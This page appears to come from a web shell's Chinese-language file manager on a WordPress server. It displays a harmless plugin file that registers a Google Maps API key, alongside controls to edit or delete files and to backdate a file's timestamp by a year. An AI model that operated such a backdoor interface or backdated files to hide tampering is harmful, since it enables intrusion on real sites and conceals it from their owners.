文件操作 - acf.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/vec.uaysen.cl/html/wp-content/plugins/us-core/plugins-support/acf.php
编辑文件内容
<?php defined( 'ABSPATH' ) OR die( 'This script cannot be accessed directly.' ); /** * Advanced Custom Fields * * @link https://www.advancedcustomfields.com/ */ if ( ! class_exists( 'ACF' ) ) { return; } // Register Google Maps API key // https://www.advancedcustomfields.com/resources/google-map/ function us_acf_google_map_api( $api ) { $api['key'] = trim( esc_attr( us_get_option( 'gmaps_api_key', '' ) ) ); return $api; } add_filter( 'acf/fields/google_map/api', 'us_acf_google_map_api' );
修改文件时间
将文件时间修改为当前时间的前一年
删除文件